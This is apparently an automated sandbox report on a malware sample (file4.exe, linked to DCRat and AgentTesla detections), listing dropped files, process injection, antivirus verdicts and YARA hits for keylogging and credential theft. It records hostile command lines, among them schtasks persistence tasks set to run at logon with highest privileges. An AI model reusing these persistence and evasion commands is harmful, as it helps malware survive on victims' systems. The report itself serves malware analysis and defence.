NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bfd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bd2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 18, 2021, 9:05 a.m.	process_identifier: 8140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92bee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (8 events)

file	C:\Users\test22\AppData\Local\Temp\5592\DCRatBuild.exe
file	C:\Users\test22\AppData\Local\Temp\FF19.tmp\FF1A.tmp\extd.exe
file	C:\Users\test22\AppData\Local\Temp\FF19.tmp\FF1A.tmp\FF2B.bat
file	C:\Users\test22\AppData\Local\Temp\5592\build.exe
file	C:\Fontreviewdriversavesdhcp\lIP0ZiOi33.bat
file	C:\Fontreviewdriversavesdhcp\FontreviewdriversavesdhcpperfDhcp.exe
file	C:\Fontreviewdriversavesdhcp\SIvoA2AIk.vbe
file	C:\Fontreviewdriversavesdhcp\2UASzCE.bat

Creates a suspicious process (6 events)

cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FF19.tmp\FF1A.tmp\FF2B.bat C:\Users\test22\AppData\Local\Temp\file4.exe"
cmdline	"schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\System32\auditpol\smss.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "KMService" /sc ONLOGON /tr "'C:\Windows\fveupdate\KMService.exe'" /rl HIGHEST /f
cmdline	"C:\Windows\System32\cmd.exe" /C "C:\Fontreviewdriversavesdhcp\lIP0ZiOi33.bat"
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\NEWS\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Documents and Settings\pw.exe'" /rl HIGHEST /f

Drops a binary and executes it (6 events)

file	C:\Users\test22\AppData\Local\Temp\FF19.tmp\FF1A.tmp\extd.exe
file	C:\Users\test22\AppData\Local\Temp\5592\build.exe
file	C:\Users\test22\AppData\Local\Temp\5592\DCRatBuild.exe
file	C:\Fontreviewdriversavesdhcp\SIvoA2AIk.vbe
file	C:\Fontreviewdriversavesdhcp\FontreviewdriversavesdhcpperfDhcp.exe
file	C:\Fontreviewdriversavesdhcp\lIP0ZiOi33.bat

Drops an executable to the user AppData folder (3 events)

file	C:\Users\test22\AppData\Local\Temp\FF19.tmp\FF1A.tmp\extd.exe
file	C:\Users\test22\AppData\Local\Temp\5592\DCRatBuild.exe
file	C:\Users\test22\AppData\Local\Temp\5592\build.exe

A process created a hidden window (7 events)

Time & API	Arguments	Status	Return
ShellExecuteExW May 18, 2021, 9:12 a.m.	show_type: 0 filepath_r: C:\Windows\sysnative\cmd parameters: /c "C:\Users\test22\AppData\Local\Temp\FF19.tmp\FF1A.tmp\FF2B.bat C:\Users\test22\AppData\Local\Temp\file4.exe" filepath: C:\Windows\sysnative\cmd	1	1
ShellExecuteExW May 18, 2021, 9:12 a.m.	show_type: 0 filepath_r: C:/Fontreviewdriversavesdhcp/2UASzCE.bat parameters: filepath: C:/Fontreviewdriversavesdhcp/2UASzCE.bat	1	1
CreateProcessInternalW May 18, 2021, 9:06 a.m.	thread_identifier: 6028 thread_handle: 0x0000000000000380 process_identifier: 9060 current_directory: C:\Fontreviewdriversavesdhcp filepath: track: 1 command_line: "schtasks" /create /tn "KMService" /sc ONLOGON /tr "'C:\Windows\fveupdate\KMService.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000388	1	1
CreateProcessInternalW May 18, 2021, 9:06 a.m.	thread_identifier: 8920 thread_handle: 0x0000000000000380 process_identifier: 6400 current_directory: C:\Fontreviewdriversavesdhcp filepath: track: 1 command_line: "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Documents and Settings\pw.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000000000000038c	1	1
CreateProcessInternalW May 18, 2021, 9:06 a.m.	thread_identifier: 3788 thread_handle: 0x00000000000003a0 process_identifier: 7524 current_directory: C:\Fontreviewdriversavesdhcp filepath: track: 1 command_line: "schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\System32\auditpol\smss.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000003a4	1	1
CreateProcessInternalW May 18, 2021, 9:06 a.m.	thread_identifier: 7128 thread_handle: 0x00000000000003ac process_identifier: 3780 current_directory: C:\Fontreviewdriversavesdhcp filepath: track: 1 command_line: "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\NEWS\pw.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000003b0	1	1
ShellExecuteExW May 18, 2021, 9:06 a.m.	show_type: 0 filepath_r: C:\Fontreviewdriversavesdhcp\lIP0ZiOi33.bat parameters: filepath: C:\Fontreviewdriversavesdhcp\lIP0ZiOi33.bat	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 18, 2021, 9:06 a.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x00003400', u'virtual_address': u'0x00013000', u'entropy': 7.110640338733982, u'name': u'.rdata', u'virtual_size': u'0x0000339d'}

entropy

7.11064033873

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00041600', u'virtual_address': u'0x00019000', u'entropy': 7.998214335701953, u'name': u'.rsrc', u'virtual_size': u'0x0004149c'}

entropy

7.9982143357

description

A section with a high entropy has been found

entropy

0.793352601156

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 18, 2021, 9:06 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW May 18, 2021, 9:06 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 115 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Steal credential	rule	local_credential_Steal
description	Take ScreenShot	rule	ScreenShot
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Escalate priviledges	rule	Escalate_priviledges
description	Win32 PWS Loki	rule	Win32_PWS_Loki_Zero
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Virtual currency	rule	Virtual_currency_Zero
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Google Chrome User Data Check	rule	Chrome_User_Data_Check_Zero
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	browser info stealer	rule	infoStealer_browser_Zero
description	Steal credential	rule	local_credential_Steal
description	Take ScreenShot	rule	ScreenShot

Uses Windows utilities for basic Windows functionality (8 events)

cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FF19.tmp\FF1A.tmp\FF2B.bat C:\Users\test22\AppData\Local\Temp\file4.exe"
cmdline	chcp 65001
cmdline	C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\FF19.tmp\FF1A.tmp\FF2B.bat C:\Users\test22\AppData\Local\Temp\file4.exe"
cmdline	"schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\System32\auditpol\smss.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "KMService" /sc ONLOGON /tr "'C:\Windows\fveupdate\KMService.exe'" /rl HIGHEST /f
cmdline	ping -n 5 localhost
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\NEWS\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Documents and Settings\pw.exe'" /rl HIGHEST /f

Communicates with host for which no DNS query was performed (2 events)

host	172.217.25.14
host	82.146.59.236

Creates an Alternate Data Stream (ADS) (4 events)

file	C:\Users\test22\AppData\Local\Temp\FF19.tmp\call:extd
file	C:\Users\test22\AppData\Local\Temp\5592\call:extd
file	C:\Users\test22\AppData\Local\Temp\FF19.tmp\goto:eof
file	C:\Users\test22\AppData\Local\Temp\5592\goto:eof

Installs itself for autorun at Windows startup (4 events)

cmdline	"schtasks" /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\System32\auditpol\smss.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "KMService" /sc ONLOGON /tr "'C:\Windows\fveupdate\KMService.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\NEWS\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Documents and Settings\pw.exe'" /rl HIGHEST /f

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	C:/Fontreviewdriversavesdhcp/2UASzCE.bat
parent_process	wscript.exe				martian_process	"C:\Fontreviewdriversavesdhcp\2UASzCE.bat"

Attempts to remove evidence of file being downloaded from the Internet (4 events)

file	C:\Python27\NEWS\pw.exe:Zone.Identifier
file	C:\Windows\System32\auditpol\smss.exe:Zone.Identifier
file	C:\Windows\fveupdate\KMService.exe:Zone.Identifier
file	C:\Documents and Settings\pw.exe:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (10 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 7180 resumed a thread in remote process 4456
Process injection	Process 4456 resumed a thread in remote process 4384
Process injection	Process 4456 resumed a thread in remote process 2120
Process injection	Process 2120 resumed a thread in remote process 7444
Process injection	Process 2300 resumed a thread in remote process 6788
NtResumeThread May 18, 2021, 9:12 a.m.	thread_handle: 0x00000204 suspend_count: 1 process_identifier: 4456	1	0	0
NtResumeThread May 18, 2021, 9:05 a.m.	thread_handle: 0x0000000000000078 suspend_count: 0 process_identifier: 4384	1	0	0
NtResumeThread May 18, 2021, 9:05 a.m.	thread_handle: 0x000000000000000c suspend_count: 0 process_identifier: 2120	1	0	0
NtResumeThread May 18, 2021, 9:12 a.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 7444	1	0	0
NtResumeThread May 18, 2021, 9:06 a.m.	thread_handle: 0x0000000000000068 suspend_count: 0 process_identifier: 6788	1	0	0

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

File has been identified by 24 AntiVirus engines on VirusTotal as malicious (24 events)

Bkav	W32.AIDetect.malware2
Elastic	malicious (high confidence)
FireEye	Generic.mg.3795c43b2e06e15e
Cylance	Unsafe
Zillya	Tool.Lazagne.Win32.102
Sangfor	Trojan.Win32.Save.a
Cybereason	malicious.50df93
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
Paloalto	generic.ml
Kaspersky	UDS:DangerousObject.Multi.Generic
Avast	FileRepMalware
Sophos	Generic ML PUA (PUA)
SentinelOne	Static AI - Suspicious PE
Jiangmin	Trojan.PowerShell.bj
eGambit	Unsafe.AI_Score_98%
Microsoft	Trojan:Win32/Sabsik.FT.A!ml
GData	Win32.Trojan.PSE.1COOEVR
Acronis	suspicious
Malwarebytes	Trojan.Downloader
Zoner	Trojan.Win32.85523
Ikarus	Trojan.Win32
AVG	FileRepMalware
CrowdStrike	win/malicious_confidence_100% (W)

file4.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All